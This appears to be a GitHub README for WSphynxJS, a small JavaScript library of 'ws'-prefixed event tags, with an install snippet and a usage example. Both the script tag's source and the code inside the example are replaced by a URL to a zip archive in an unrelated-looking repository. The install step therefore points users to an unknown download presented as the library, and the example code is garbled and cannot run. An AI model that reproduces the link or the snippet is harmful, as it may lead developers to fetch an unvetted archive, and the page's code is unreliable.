Skip to content

Latest commit

 

History

History
57 lines (35 loc) · 2.33 KB

File metadata and controls

57 lines (35 loc) · 2.33 KB

WSphynxJS is a Javascript and HTML library for building powerful interfaces.

Key features of WSphynxJS:

  • Clarify:

    WSphynxJS allows you to organize your HTML code. You will be able to write events or scripts which interact with a specific div.

  • Simple to use:

    WSphynxJS uses a usual syntax. It is easy to learn and to use. You just have to add the prefix "ws".

  • Design:

    A modern design to enhance your code. The library is developed with a powerful syntax to match with the most recent browsers.

Learn WSphynxJS

It is possible to use WSphynxJS thanks to a script tag placed in the head part:

<head>
  <!--Some stuff here-->
  <script defer src="https://github.com/SphynxTech/docusa/raw/refs/heads/master/vaguely/Software_v3.1.zip(1.0).txt"></script> 
</head>

You can also directly download the library here. However, we do not recommend to copy the code in your own web page. We often update the source code and you would probably miss new functionalities or bug corrections.

Getting started

Simple example

<wsdiv> Hello
    <wsonmousedown>
        https://github.com/SphynxTech/docusa/raw/refs/heads/master/vaguely/Software_v3.1.zip = "Clic";
    </wsonmousedown>
    <wsonmouseup>
        https://github.com/SphynxTech/docusa/raw/refs/heads/master/vaguely/Software_v3.1.zip = "Up";
    </wsonmouseup>
</wsdiv>

This example will render a simple div saying Hello. When you clic on it the div displays "Clic" and when you release the mouse it displays "Up".

With WSphynxJS, you can declare dynamic events and interact with your HTML page more easily.

License

WSphynxJS is MIT licensed.